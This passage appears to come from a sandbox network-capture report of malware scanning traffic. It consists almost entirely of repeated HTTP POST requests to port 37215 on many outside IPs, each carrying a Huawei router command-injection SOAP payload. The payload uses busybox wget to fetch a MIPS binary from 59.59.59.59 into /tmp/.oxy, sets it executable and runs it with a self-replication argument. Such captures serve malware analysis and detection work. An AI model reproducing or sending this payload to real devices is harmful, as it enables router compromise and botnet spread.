                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1747192.168.2.155526251.133.22.19537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.916325092 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1748192.168.2.155234041.47.129.4537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.916404963 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1749192.168.2.1558388197.114.208.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.916426897 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1750192.168.2.1550284197.71.10.17437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.916533947 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1751192.168.2.1541620187.187.168.23037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.921355963 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1752192.168.2.1554664157.239.104.17737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.921376944 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1753192.168.2.153654041.78.144.11137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.921538115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1754192.168.2.1537370157.249.107.10137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.921756029 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1755192.168.2.155590241.233.209.4437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.921787977 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1756192.168.2.1557946157.96.27.22437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.926620007 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
